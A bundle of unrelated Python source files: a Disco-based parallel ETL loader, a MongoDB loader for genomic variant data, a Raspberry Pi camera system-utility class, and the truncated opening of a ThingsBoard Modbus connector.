Thread(target = running) threadD = Thread(target = get_firebase) threadB.setDaemon = True threadD.setDaemon = True threadB.start() threadD.start()
paralleletl.py
''' Usage: python etlmr.py [options] input_paths ''' # # Copyright (c) 2011 Xiufeng Liu (xiliu@cs.aau.dk) # # This file is free software: you may copy, redistribute and/or modify it # under the terms of the GNU General Public License version 2 # as published by the Free Software Foundation. # # This file is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os, getopt, sys, time, socket, multiprocessing from thread import * from optparse import OptionParser from os import getenv import pyetlmr from conf import config from disco.core import Disco, Params, result_iterator import offdimetlmr, odotetlmr, odatetlmr from postfix import post_fix __author__ = "Xiufeng Liu" __maintainer__ = "Xiufeng Liu" __version__ = '0.1.0' def seq_init(): conn = config.connection dims = set() seq={} for dimension in config.dimensions: if type(dimension)==pyetlmr.odattables.SnowflakedDimension: dims.update(dimension.sfdims) else: dims.add(dimension) for dim in dims: conn.execute("SELECT MAX(%(key)s) FROM %(name)s" %\ {'key':dim.key, 'name':dim.name}) maxid = conn.fetchonetuple()[0] if maxid: seq[dim.name] = maxid return seq def client_thread(conn, seq): while True: data = conn.recv(1024) nextid = seq.get(data, 1); seq[data] = nextid + 1 if data=='END' or data=='': break conn.sendall(str(nextid)) conn.close() def seq_server(): HOST = '' PORT = 8888 MAX_CON_NUM = 20 seq = seq_init() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.bind((HOST, PORT)) except socket.error , msg: print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] sys.exit() s.listen(MAX_CON_NUM) while True: conn, addr = s.accept() start_new_thread(client_thread ,(conn, seq)) s.close() def load_dim(master, input, config_path, nr_maps=1, \ nr_reduces=1, load_method=offdimetlmr, \ post_fixing=-1, go_live=1, profile=False): try: order = config.order except Exception: order = [config.dimensions.keys()] dim_starttime = time.time() for dims in order: dimnames = repr([dim.name for dim in dims]) print "Loading %s ..." % str(dimnames) load_one_dim(master, input, config_path, nr_maps,\ nr_reduces, load_method, dimnames, go_live, profile) dim_endtime = time.time() print "Time of loading dimensions: %f seconds" % (dim_endtime-dim_starttime) if post_fixing==1: post_fix(config) def load_one_dim(master, input, config_path, nr_maps=1, nr_reduces=1,\ load_method=offdimetlmr, dimnames= repr([]), \ go_live=1, profile=False): dim_job = master.new_job( name = 'dim', input = input, map_init = load_method.dim_map_init, map_reader = load_method.map_reader, map = load_method.dim_map_func, partition = load_method.dim_partition_func, combiner = load_method.dim_combiner_func, reduce = load_method.dim_reduce_func, scheduler = {'max_cores': nr_maps}, nr_reduces = nr_reduces, required_modules=[('config', config_path)], profile = profile, status_interval = 1000000, params = Params(count=0, dimnames=dimnames, \ nr_maps=nr_maps, nr_reduces=nr_reduces) ) results = dim_job.wait() shelvedb_paths = [] if results!=None: for key,value in result_iterator(results): shelvedb_paths.append(key) if go_live==1: load_method.golive(config, shelvedb_paths) #results = dim_job.wait(show=True, poll_interval = 100, timeout = 10*3600) #dim_job.purge() def load_fact(master, input, config_path, nr_maps=1, nr_reduces=1, \ load_method=offdimetlmr, profile=False): #disco = Disco("disco://"+host) fact_starttime = time.time() fact_job = master.new_job( name = 'fact', input = input, map_init = load_method.fact_map_init, map_reader = load_method.map_reader, map = load_method.fact_map_func, combiner = load_method.fact_combiner_func, scheduler = {'max_cores': nr_maps}, nr_reduces = nr_reduces, required_modules=[('config', config_path),], status_interval = 1000000, profile = profile, params = Params(totalcopytime=0, nr_maps=nr_maps, \ nr_reduces=nr_reduces) ) results = fact_job.wait() #results = fact_job.wait(show=True, poll_interval = 100, timeout = 10*3600) fact_endtime = time.time() print "Time of loading facts: %f seconds" % (fact_endtime-fact_starttime) #fact_job.purge() if __name__== "__main__": disco_home = os.environ["DISCO_HOME"] parser = OptionParser(usage='%etlmr [options] input_paths') parser.add_option('--disco-master', default=getenv('DISCO_MASTER'), help='Disco master') parser.add_option('--nr-maps', default=2, help='Numbers of mappers (default=1)') parser.add_option('--nr-reducers', default=2, help='Numbers of reducers (default=1)') parser.add_option('--load-step', default=1, help='Loading step (default=1): 1. Load dimensions; \ 2. Load facts') parser.add_option('--load-method', default=1, help='Loading method of dimensions (default=1): 1. Online ODOT; \ 2. Online ODAT; 3. Offline dim') parser.add_option('--post-fix', default=1, help='Does post-fixing for ODAT? (default=1): 1. Yes; 2. No') parser.add_option('--go-live', default=1, help='Load offline dim data to DW DBMS? (default=1): 1. yes; 2. No') parser.add_option('--profile', default=False, help='Profile (default=False)') parser.add_option('--config', default='conf/config.py', help='The path to config.py (default=conf/config.py)') (options, input_paths) = parser.parse_args() master = Disco("disco://"+options.disco_master) load_method = odotetlmr seq_process = None post_fixing = -1 load_step = int(options.load_step) if options.load_method=='2': load_method = odatetlmr if load_step==1: post_fixing = int(options.post_fix) seq_process = multiprocessing.Process(target=seq_server) seq_process.start() elif options.load_method=='3': load_method = offdimetlmr input_file_urls = [] for input_path in input_paths: input_files = [f for f in os.listdir(input_path) if \ os.path.isfile(os.path.join(input_path, f))] prefix = input_path.partition(os.path.join(disco_home, 'root', 'input'))[2] input_file_urls.extend(['dfs://%s%s' % (options.disco_master, \ os.path.join(prefix, f)) \ for f in input_files]) print "input_file_urls=%s" % str(input_file_urls) if load_step==1: load_dim(master, input_file_urls, config_path=options.config,\ nr_maps=int(options.nr_maps), nr_reduces=int(options.nr_reducers), load_method=load_method, \ post_fixing=post_fixing, go_live=int(options.go_live), profile=options.profile) if seq_process: seq_process.terminate() elif load_step==2: load_fact(master, input_file_urls, config_path=options.config, \ nr_maps=int(options.nr_maps), nr_reduces=int(options.nr_reducers),load_method=load_method,\ profile=options.profile) else: parser.print_help()
__init__.py
### all the mongodb reading/writing code lives here now def load_db(): """ Load the database """ # Initialize database # Don't need to explicitly create tables with mongo, just indices confirm = raw_input('This will drop the database and reload. Are you sure you want to continue? [no] ') if not confirm.startswith('y'): print('Exiting...') sys.exit(1) all_procs = [] for load_function in [load_variants_file, load_dbsnp_file, load_base_coverage, load_gene_models, load_constraint_information]: procs = load_function() all_procs.extend(procs) print("Started %s processes to run %s" % (len(procs), load_function.__name__)) [p.join() for p in all_procs] print('Done! Loading MNPs...') load_mnps() print('Done! Creating cache...') create_cache() print('Done!') def load_base_coverage(): """ """ def load_coverage(coverage_files, i, n, db): coverage_generator = parse_tabix_file_subset(coverage_files, i, n, get_base_coverage_from_file) try: db.base_coverage.insert(coverage_generator, w=0) except pymongo.errors.InvalidOperation, e: print(e) # handle error when coverage_generator is empty pass db = get_db() db.base_coverage.drop() print("Dropped db.base_coverage") # load coverage first; variant info will depend on coverage db.base_coverage.ensure_index('xpos') procs = [] coverage_files = app.config['BASE_COVERAGE_FILES'] num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES'] random.shuffle(app.config['BASE_COVERAGE_FILES']) for i in range(num_procs): p = Process(target=load_coverage, args=(coverage_files, i, num_procs, db)) p.start() procs.append(p) return procs #print 'Done loading coverage. Took %s seconds' % int(time.time() - start_time) def load_variants_file(): def load_variants(sites_file, i, n, db): for f in sites_file: variants_generator = parse_tabix_file_subset([f], i, n, get_variants_from_sites_vcf) try: db.variants.insert(variants_generator, w=0) except pymongo.errors.InvalidOperation: pass # handle error when variant_generator is empty db = get_db() db.variants.drop() print("Dropped db.variants") # grab variants from sites VCF db.variants.ensure_index('xpos') db.variants.ensure_index('xstart') db.variants.ensure_index('xstop') db.variants.ensure_index('rsid') db.variants.ensure_index('genes') db.variants.ensure_index('transcripts') sites_vcfs = app.config['SITES_VCFS'] print(sites_vcfs) #if len(sites_vcfs) > 1: raise Exception("More than one sites vcf file found: %s" % sites_vcfs) procs = [] num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES'] #pdb.set_trace() for i in range(num_procs): p = Process(target=load_variants, args=(sites_vcfs, i, num_procs, db)) p.start() procs.append(p) return procs #print 'Done loading variants. Took %s seconds' % int(time.time() - start_time) def load_constraint_information(): db = get_db() db.constraint.drop() print 'Dropped db.constraint.' start_time = time.time() with gzip.open(app.config['CONSTRAINT_FILE']) as constraint_file: for transcript in get_constraint_information(constraint_file): db.constraint.insert(transcript, w=0) db.constraint.ensure_index('transcript') print 'Done loading constraint info. Took %s seconds' % int(time.time() - start_time) def load_mnps(): db = get_db() start_time = time.time() db.variants.ensure_index('has_mnp') print 'Done indexing.' while db.variants.find_and_modify({'has_mnp' : True}, {'$unset': {'has_mnp': '', 'mnps': ''}}): pass print 'Deleted MNP data.' with gzip.open(app.config['MNP_FILE']) as mnp_file: for mnp in get_mnp_data(mnp_file): variant = lookups.get_raw_variant(db, mnp['xpos'], mnp['ref'], mnp['alt'], True) db.variants.find_and_modify({'_id': variant['_id']}, {'$set': {'has_mnp': True}, '$push': {'mnps': mnp}}, w=0) db.variants.ensure_index('has_mnp') print 'Done loading MNP info. Took %s seconds' % int(time.time() - start_time) def load_gene_models(): db = get_db() db.genes.drop() db.transcripts.drop() db.exons.drop() print 'Dropped db.genes, db.transcripts, and db.exons.' start_time = time.time() canonical_transcripts = {} with gzip.open(app.config['CANONICAL_TRANSCRIPT_FILE']) as canonical_transcript_file: for gene, transcript in get_canonical_transcripts(canonical_transcript_file): canonical_transcripts[gene] = transcript omim_annotations = {} with gzip.open(app.config['OMIM_FILE']) as omim_file: for fields in get_omim_associations(omim_file): if fields is None: continue gene, transcript, accession, description = fields omim_annotations[gene] = (accession, description) dbnsfp_info = {} with gzip.open(app.config['DBNSFP_FILE']) as dbnsfp_file: for dbnsfp_gene in get_dbnsfp_info(dbnsfp_file): other_names = [other_name.upper() for other_name in dbnsfp_gene['gene_other_names']] dbnsfp_info[dbnsfp_gene['ensembl_gene']] = (dbnsfp_gene['gene_full_name'], other_names) print 'Done loading metadata. Took %s seconds' % int(time.time() - start_time) # grab genes from GTF start_time = time.time() with gzip.open(app.config['GENCODE_GTF']) as gtf_file: for gene in get_genes_from_gencode_gtf(gtf_file): gene_id = gene['gene_id'] if gene_id in canonical_transcripts: gene['canonical_transcript'] = canonical_transcripts[gene_id] if gene_id in omim_annotations: gene['omim_accession'] = omim_annotations[gene_id][0] gene['omim_description'] = omim_annotations[gene_id][1] if gene_id in dbnsfp_info: gene['full_gene_name'] = dbnsfp_info[gene_id][0] gene['other_names'] = dbnsfp_info[gene_id][1] db.genes.insert(gene, w=0) print 'Done loading genes. Took %s seconds' % int(time.time() - start_time) start_time = time.time() db.genes.ensure_index('gene_id') db.genes.ensure_index('gene_name_upper') db.genes.ensure_index('gene_name') db.genes.ensure_index('other_names') db.genes.ensure_index('xstart') db.genes.ensure_index('xstop') print 'Done indexing gene table. Took %s seconds' % int(time.time() - start_time) # and now transcripts start_time = time.time() with gzip.open(app.config['GENCODE_GTF']) as gtf_file: db.transcripts.insert((transcript for transcript in get_transcripts_from_gencode_gtf(gtf_file)), w=0) print 'Done loading transcripts. Took %s seconds' % int(time.time() - start_time) start_time = time.time() db.transcripts.ensure_index('transcript_id') db.transcripts.ensure_index('gene_id') print 'Done indexing transcript table. Took %s seconds' % int(time.time() - start_time) # Building up gene definitions start_time = time.time() with gzip.open(app.config['GENCODE_GTF']) as gtf_file: db.exons.insert((exon for exon in get_exons_from_gencode_gtf(gtf_file)), w=0) print 'Done loading exons. Took %s seconds' % int(time.time() - start_time) start_time = time.time() db.exons.ensure_index('exon_id') db.exons.ensure_index('transcript_id') db.exons.ensure_index('gene_id') print 'Done indexing exon table. Took %s seconds' % int(time.time() - start_time) return [] def load_dbsnp_file(): db = get_db() def load_dbsnp(dbsnp_file, i, n, db): if os.path.isfile(dbsnp_file + ".tbi"): dbsnp_record_generator = parse_tabix_file_subset([dbsnp_file], i, n, get_snp_from_dbsnp_file) try: db.dbsnp.insert(dbsnp_record_generator, w=0) except pymongo.errors.InvalidOperation: pass # handle error when coverage_generator is empty else: with gzip.open(dbsnp_file) as f: db.dbsnp.insert((snp for snp in get_snp_from_dbsnp_file(f)), w=0) db.dbsnp.drop() db.dbsnp.ensure_index('rsid') db.dbsnp.ensure_index('xpos') start_time = time.time() dbsnp_file = app.config['DBSNP_FILE'] print "Loading dbsnp from %s" % dbsnp_file if os.path.isfile(dbsnp_file + ".tbi"): num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES'] else: # see if non-tabixed .gz version exists if os.path.isfile(dbsnp_file): print(("WARNING: %(dbsnp_file)s.tbi index file not found. Will use single thread to load dbsnp." "To create a tabix-indexed dbsnp file based on UCSC dbsnp, do: \n" " wget http://hgdownload.soe.ucsc.edu/goldenPath/hg19/database/snp141.txt.gz \n" " gzcat snp141.txt.gz | cut -f 1-5 | bgzip -c > snp141.txt.bgz \n" " tabix -0 -s 2 -b 3 -e 4 snp141.txt.bgz") % locals()) num_procs = 1 else: raise Exception("dbsnp file %s(dbsnp_file)s not found." % locals()) procs = [] for i in range(num_procs): p = Process(target=load_dbsnp, args=(dbsnp_file, i, num_procs, db)) p.start() procs.append(p) return procs #print 'Done loading dbSNP. Took %s seconds' % int(time.time() - start_time) #start_time = time.time() #db.dbsnp.ensure_index('rsid') #print 'Done indexing dbSNP table. Took %s seconds' % int(time.time() - start_time)
SysUtil.py
import subprocess import random, string, os, socket, json, time from glob import glob from urllib import request import threading import configparser import yaml import logging import logging.config import fcntl import datetime USBDEVFS_RESET = 21780 try: logging.config.fileConfig("logging.ini") except: pass def sizeof_fmt(num, suffix='B'): for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']: if abs(num) < 1024.0: return "%3.1f%s%s" % (num, unit, suffix) num /= 1024.0 return "%.1f%s%s" % (num, 'Yi', suffix) default_config = """ [DEFAULT] exposure = 0 enabled = on resize = on [camera] name = enabled = on [ftp] enabled = on replace = on resize = on timestamped = on server = sftp.traitcapture.org directory = / username = picam password = DEFAULT_PASSWORD [timelapse] interval = 300 starttime = 00:00 stoptime = 23:59 [localfiles] spooling_dir = upload_dir = """ default_light_config = """ [light] max_power = 1000 min_power = 0 wavelengths = "400nm,420nm,450nm,530nm,630nm,660nm,735nm" csv_keys = "LED1,LED2,LED3,LED4,LED5,LED6,LED7" file_path = "lights_byserial/{identifier}.scf" [telnet] telnet_host = "192.168.2.124" telnet_port = 50630 set_all_command = setall {power} set_wavelength_command = setwlrelpower {wavelength} {power} set_all_wavelength_command = setwlsrelpower {} {} {} {} {} {} {} get_wavelength_command = getwlrelpower {wavelength} [url] url_host = "192.168.2.124" control_uri = /cgi-bin/userI.cgi set_all_command = "setAllTo": {percent}, "setAllSub": "set" set_all_wavelength_command = "wl1":{}, "wl2":{}, "wl3":{}, "wl4":{}, "wl5":{}, "wl6":{}, "wl7":{} """ class SysUtil(object): """ System utility class. Helper class to cache various things like the hostname, machine-id, amount of space in the filesystem. """ _ip_address = "0.0.0.0", 0 _external_ip = "0.0.0.0", 0 _machine_id = "", 0 _hostname = "HOSTNAME", 0 _tor_host = ("unknown.onion", "not a real key", "not a real client"), 0 _version = "Unknown spc-eyepi version", 0 a_statvfs = os.statvfs("/") _fs = (a_statvfs.f_frsize * a_statvfs.f_bavail, a_statvfs.f_frsize * a_statvfs.f_blocks), 0 _watches = list() thread = None stop = False logger = logging.getLogger("SysUtil") def __init__(self): if SysUtil.thread is None: SysUtil.thread = threading.Thread(target=self._thread) SysUtil.thread.start() pass @staticmethod def reset_usb_device(bus: int, dev: int) -> bool: """ resets a usb device. :param bus: bus number :type bus: int :param dev: device number of the device on the bus above :type dev: int """ try: fn = "/dev/bus/usb/{bus:03d}/{dev:03d}".format(bus=bus, dev=dev) with open(fn, 'w', os.O_WRONLY) as f: fcntl.ioctl(f, USBDEVFS_RESET, 0) return True except Exception as e: SysUtil.logger.error("Couldnt reset usb device (possible filenotfound): {}".format(str(e))) @staticmethod def default_identifier(prefix=None): """ returns an identifier, If no prefix available, generates something. :param prefix: :return: string of the itentifier. :rtype: str """ if prefix: return SysUtil.get_identifier_from_name(prefix) else: from hashlib import md5 serialnumber = ("AUTO_" + md5(bytes(prefix, 'utf-8')).hexdigest()[len("AUTO_"):])[:32] SysUtil.logger.warning("using autogenerated serialnumber {}".format(serialnumber)) return serialnumber @staticmethod def _nested_lookup(key, document): """ nested document lookup, works on dicts and lists :param key: string of key to lookup :param document: dict or list to lookup :return: yields item """ if isinstance(document, list): for d in document: for result in SysUtil._nested_lookup(key, d): yield result if isinstance(document, dict): for k, v in document.items(): if k == key: yield v elif isinstance(v, dict): for result in SysUtil._nested_lookup(key, v): yield result elif isinstance(v, list): for d in v: for result in SysUtil._nested_lookup(key, d): yield result @staticmethod def sizeof_fmt(num, suffix='B')->str: """ formats a number of bytes in to a human readable string. returns in SI units eg sizeof_fmt(1234) returns '1.2KiB' :param num: number of bytes to format :param suffix: the suffix to use :return: human formattted string. :rtype: str """ for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']: if abs(num) < 1024.0: return "%3.1f%s%s" % (num, unit, suffix) num /= 1024.0 return "%.1f%s%s" % (num, 'Yi', suffix) @classmethod def update_from_git(cls): """ updates spc-eyepi from git. """ os.system("git fetch --all;git reset --hard origin/master") os.system("systemctl restart spc-eyepi_capture.service") @classmethod def get_hostname(cls)->str: """ gets the current hostname. if there is no /etc/hostname file, sets the hostname randomly. :return: the current hostname or the hostname it was set to :rtype: str """ if abs(cls._hostname[-1] - time.time()) > 10: if not os.path.isfile("/etc/hostname"): hostname = "".join(random.choice(string.ascii_letters) for _ in range(8)) os.system("hostname {}".format(cls._hostname)) else: with open("/etc/hostname", "r") as fn: hostname = fn.read().strip() cls._hostname = hostname, time.time() return cls._hostname[0] @classmethod def set_hostname(cls, hostname: str): """ sets the machines hosname, in /etc/hosts and /etc/hostname :param hostname: the string of which to set the hostname to. """ try: with open(os.path.join("/etc/", "hostname"), 'w') as f: f.write(hostname + "\n") with open(os.path.join("/etc/", "hosts"), 'w') as hosts_file: h_tmpl = "127.0.0.1\tlocalhost.localdomain localhost {hostname}\n" h_tmpl += "::1\tlocalhost.localdomain localhost {hostname}\n" hosts_file.write(h_tmpl.format(hostname=hostname)) except Exception as e: cls.logger.error("Failed setting hostname for machine. {}".format(str(e))) @classmethod def get_machineid(cls)->str: """ gets the machine id, or initialises the machine id if it doesnt exist. :return: string of the machine-id :rtype: str """ if abs(cls._machine_id[-1] - time.time()) > 10: if not os.path.isfile("/etc/machine-id"): os.system("systemd-machine-id-setup") with open("/etc/machine-id") as f: cls._machine_id = f.read().strip(), time.time() return cls._machine_id[0] @classmethod def get_tor_host(cls)->tuple: """ gets a tuple of the current tor host. :return: tuple of hostname(onion address), client key, client name :rtype: tuple[str, str, str] """ if abs(cls._tor_host[-1] - time.time()) > 10: try: with open("/home/tor_private/hostname") as f: onion_address = f.read().replace('\n', '') cls._tor_host = onion_address.split(" ")[:3], time.time() except: cls._tor_host = ("unknown", 'unknown', "unknown"), time.time() return cls._tor_host[0] @classmethod def get_fs_space(cls)->tuple: """ returns free/total space of root filesystem as bytes(?) :return: tuple of free/total space :rtype: tuple[int, int] """ if abs(cls._fs[-1] - time.time()) > 10: try: a_statvfs = os.statvfs("/") cls._fs = ( a_statvfs.f_frsize * a_statvfs.f_bavail, a_statvfs.f_frsize * a_statvfs.f_blocks), time.time() except: cls._fs = (0, 0), time.time() return cls._fs[0] @classmethod def get_fs_space_mb(cls)->tuple: """ returns the filesystems free space in mebibytes. see :func:`get_fs_space` :return: tuple of free/total space :rtype:tuple[int, int] """ free_space, total_space = SysUtil.get_fs_space() for x in range(0, 2): free_space /= 1024.0 total_space /= 1024.0 return free_space, total_space @classmethod def get_version(cls)->str: """ gets the "describe" version of the current git repo as a string. :return: the current version :rtype: str """ if abs(cls._version[-1] - time.time()) > 10: try: cmd = "/usr/bin/git describe --always" cls._version = subprocess.check_output([cmd], shell=True).decode().strip("\n"), time.time() except: cls._version = "unknown", time.time() return cls._version[0] @classmethod def get_internal_ip(cls): """ gets the internal ip by attempting to connect to googles DNS :return: the current internal ip :rtype: str """ if abs(cls._ip_address[-1] - time.time()) > 10: try: try: import netifaces ip = netifaces.ifaddresses("tun0")[netifaces.AF_INET][0]["addr"] cls._ip_address = ip, time.time() except: import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 0)) cls._ip_address = s.getsockname()[0], time.time() except: cls._ip_address = "0.0.0.0", time.time() return cls._ip_address[0] @classmethod def get_log_files(cls) -> list: """ returns the spc-eyepi log files that have been rotated. :return: list of filenames :rtype: list(str) """ return list(glob("/home/spc-eyepi/spc-eyepi.log.*")) @classmethod def clear_files(cls, filenames: list): """ removes all files in the list provided, skipping and logging on an error removing todo: Do different things based on whether is a directory. :param filenames: list of directories or files :type filenames: list or tuple """ for f in filenames: try: os.remove(f) except FileNotFoundError as e: cls.logger.debug(str(e)) except IsADirectoryError as e: cls.logger.error(str(e)) except Exception as e: cls.logger.error(str(e)) @classmethod def get_isonow(cls): """ gets the current time as an iso8601 string :return: the current time as iso8601 :rtype: str """ return datetime.datetime.now().isoformat() @classmethod def get_external_ip(cls): """ returns the external IP address of the raspberry pi through api.ipify.org :return: the external ip address :rtype: str """ if abs(cls._external_ip[-1] - time.time()) > 60: try: url = 'https://api.ipify.org/?format=json' response = request.urlopen(url, timeout=10).read().decode('utf-8') cls._external_ip = json.loads(response)['ip'], time.time() except: cls._external_ip = "0.0.0.0", time.time() return cls._external_ip[0] @classmethod def get_identifier_from_name(cls, name): """ returns either the identifier (from name) or the name filled with the machine id clamps to 32 characters. :param name: name to fill :type name: str :return: filled name :rtype: str """ identifier = "".join((x if idx > len(name) - 1 else name[idx] for idx, x in enumerate(cls.get_machineid()))) return identifier[:32] @classmethod def get_identifier_from_filename(cls, file_name): """ returns either the identifier (from the file name) or the name filled with the machine id :param file_name: filename :type file_name: str :return: string identifier, :rtype: str """ fsn = next(iter(os.path.splitext(os.path.basename(file_name))), "") return cls.get_identifier_from_name(fsn) @classmethod def ensure_config(cls, identifier): """ ensures a configuration file exists for this identifier. if a config file doesnt exist then it will create a default one. :param identifier: identifier to create or find a configuration file for. :type identifier: str :return: the configuration file dict or configparser object. :rtype: dict or configparser.ConfigParser """ config = configparser.ConfigParser() config.read_string(default_config) path = cls.identifier_to_ini(identifier) try: if len(config.read(path)): return config except Exception as e: print(str(e)) if not config['localfiles']['spooling_dir']: config['localfiles']['spooling_dir'] = "/home/images/spool/{}".format(identifier) if not config['localfiles']['upload_dir']: config['localfiles']['upload_dir'] = "/home/images/upload/{}".format(identifier) if not config['camera']['name']: config['camera']['name'] = cls.get_hostname() + identifier[:6] cls.write_config(config, identifier) return config @classmethod def write_config(cls, config: configparser.ConfigParser, identifier: str): """ writes a configuration file to an correct config file path. :param config: configuration file (configparser object) :type identifier: str :param identifier: identifier to user as the raget file name. :return: configparser object """ path = SysUtil.identifier_to_ini(identifier) with open(path, 'w+') as configfile: config.write(configfile) return config @classmethod def identifier_to_ini(cls, identifier: str)->str: """ gets a valid .ini path for an identifier. :param identifier: identifier to find an ini for. :return: file path for identifier :rtype: str """ for fn in glob("configs_byserial/*.ini"): if identifier == cls.get_identifier_from_filename(fn): return fn else: return os.path.join("configs_byserial/", identifier) + ".ini" @classmethod def ensure_light_config(cls, identifier): """ ensures a configuration file exists for this identifier. if a config file doesnt exist then it will create a default one. :param identifier: identifier of the light :type identifier: str :return: configuration for the light :rtype: configparser.ConfigParser """ config = configparser.ConfigParser() config.read_string(default_light_config) path = cls.identifier_to_ini(identifier) try: if len(config.read(path)): return config except Exception as e: print(str(e)) if "{identifier}" in config.get("light", "file_path"): config.set("light", "file_path", config.get('light', "file_path").format(identifier=identifier)) cls.write_light_config(config, identifier) return config @classmethod def get_light_configs(cls): """ gets a dict of the light config files (.ini) :return: dict of light configs :rtype: dict(str: configparser.ConfigParser) """ def slc_csv_exists(fp): return os.path.exists(os.path.splitext(fp)[0]+".csv") or os.path.exists(os.path.splitext(fp)[0]+".slc") def get_id(fp): n, ext = os.path.splitext(os.path.basename(fp)) return n try: files = [x for x in glob("light_configs_byip/*.ini") if slc_csv_exists(x)] f_and_id = {get_id(x): x for x in files} return f_and_id except Exception as e: cls.logger.error("Couldnt enumerate lights, no light functionality. {}".format(str(e))) return dict() @classmethod def write_light_config(cls, config: configparser.ConfigParser, identifier: str): """ writes a configuration file to an correct config file path. :param config: configuration file (configparser object) :param identifier: identifier of the light. :type identifier: str :return: configparser object """ path = SysUtil.light_identifier_to_ini(identifier) with open(path, 'w+') as configfile: config.write(configfile) return config @classmethod def get_light_datafile(cls, identifier: str)->str: """ gets a light datafile :param identifier: identifier to use to find the data file. :type identifier: str :return: file path for csv or slc. :rtype: str """ csv = "lights_byip/{}.csv".format(identifier) slc = "lights_byip/{}.slc".format(identifier) if os.path.exists(slc) and os.path.isfile(slc): return slc elif os.path.exists(csv) and os.path.isfile(csv): return csv else: return "" @classmethod def load_or_fix_solarcalc(cls, identifier: str)->list: """ function to either load an existing fixed up solarcalc file or to coerce one into the fixed format. :param identifier: identifier of the light for which the solarcalc file exists. :type identifier: str :return: light timing data as a list of lists. :rtype: list(list()) """ lx = [] fp = cls.get_light_datafile(identifier) path, ext = os.path.splitext(fp) header10 = ['datetime', 'temp', 'relativehumidity', 'LED1', 'LED2', 'LED3', 'LED4', 'LED5', 'LED6', 'LED7', 'LED8', 'LED9', 'LED10', 'total_solar_watt', 'simulated_datetime'] header7 = ['datetime', 'temp', 'relativehumidity', 'LED1', 'LED2', 'LED3', 'LED4', 'LED5', 'LED6', 'LED7', 'total_solar_watt', 'simulated_datetime'] if not os.path.isfile(fp): SysUtil.logger.error("no SolarCalc file.") raise FileNotFoundError() if ext == ".slc": with open(fp) as f: lx = [x.strip().split(",") for x in f.readlines()] else: with open(fp) as f: l = [x.strip().split(",") for x in f.readlines()] def get_lines(li): print("Loading csv") for idx, line in enumerate(li): try: yield [ datetime.datetime.strptime("{}_{}".format(line[0], line[1]), "%d/%m/%Y_%H:%M").isoformat(), *line[2:-1], datetime.datetime.strptime(line[-1], "%d %b %Y %H:%M").isoformat() ] except Exception as e: SysUtil.logger.error("Couldnt fix solarcalc file. {}".format(str(e))) print(l) lx.extend(get_lines(l)) if len(l[0]) == 15: lx.insert(0, header10) else: lx.insert(0, header7) with open(path+".slc", 'w') as f: f.write("\n".join([",".join(x) for x in lx])) for idx, x in enumerate(lx[1:]): lx[idx+1][0] = datetime.datetime.strptime(x[0], "%Y-%m-%dT%H:%M:%S") lx[idx+1][-1] = datetime.datetime.strptime(x[-1], "%Y-%m-%dT%H:%M:%S") return lx[1:] @classmethod def light_identifier_to_ini(cls, identifier: str)->str: """ gets a valid .ini path for an identifier. :param identifier: identifier for a light :type identifier: str :return: ini filename for a light :rtype: str """ for fn in glob("lights_byip/*.ini"): if identifier == cls.get_identifier_from_filename(fn): return fn else: return os.path.join("lights_byip/", identifier) + ".ini" @classmethod def identifier_to_yml(cls, identifier: str)->str: """ the same as identifier_to_ini but for yml files :param identifier: identifier for a matching yml file. :type identifier: str :return: string filepath for the yml file. :rtype: str """ for fn in glob("configs_byserial/*.yml"): if identifier == cls.get_identifier_from_filename(fn): return fn else: return os.path.join("configs_byserial/", identifier) + ".yml" @classmethod def configs_from_identifiers(cls, identifiers: set) -> dict: """ given a set of identifiers, returns a dictionary of the data contained in those config files with the key for each config file data being the identifier :param identifiers: :type identifiers: list(str) :return: dictionary of configuration datas :rtype: dict(str: dict) """ data = dict() for ini in ["configs_byserial/{}.ini".format(x) for x in identifiers]: cfg = configparser.ConfigParser() cfg.read(ini) d = dict() d = {section: dict(cfg.items(section)) for section in cfg.sections()} data[cls.get_identifier_from_filename(ini)] = d return data @classmethod def add_watch(cls, path: str, callback): """ adds a watch that calls the callback on file change :param path: path of the file to watch :type path: str :param callback: function signature to call when the file is changed """ cls._watches.append((path, os.stat(path).st_mtime, callback)) @classmethod def open_yaml(cls, filename): """ opens a yaml file using yaml.load :param filename: yaml file to load :return: dictionary of values in yaml file :rtype: dict """ try: with open(filename) as e: q = yaml.load(e.read()) return q except Exception as e: print(str(e)) return dict() @classmethod def _thread(cls): """ runs the watchers """ while True and not cls.stop: try: for index, (path, mtime, callback) in enumerate(cls._watches): tmt = os.stat(path).st_mtime if tmt != mtime: cls._watches[index] = (path, tmt, callback) try: print("calling {}".format(callback)) callback() except Exception as e: print(str(e)) time.sleep(1) except Exception as e: break cls.thread = None
modbus_connector.py
# Copyright 2022. ThingsBoard # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from threading import Thread from time import sleep, time from queue import Queue from random import choice from string import ascii_lowercase from thingsboard_gateway.tb_utility.tb_utility import TBUtility # Try import Pymodbus library or install it and import try: from pymodbus.constants import Defaults except ImportError: print("Modbus library not found - installing...") TBUtility.install_package("pymodbus", ">=2.3.0") TBUtility.install_package('pyserial') TBUtility.install_package('twisted') from pymodbus.constants import Defaults from twisted.internet import reactor from pymodbus.bit_write_message import WriteSingleCoilResponse, WriteMultipleCoilsResponse from pymodbus.register_write_message import WriteMultipleRegistersResponse, WriteSingleRegisterResponse from pymodbus.register_read_message import ReadRegistersResponseBase from pymodbus.bit_read_message import ReadBitsResponseBase from pymodbus.client.sync import ModbusTcpClient, ModbusUdpClient, ModbusSerialClient from pymodbus.client.sync import ModbusRtuFramer, 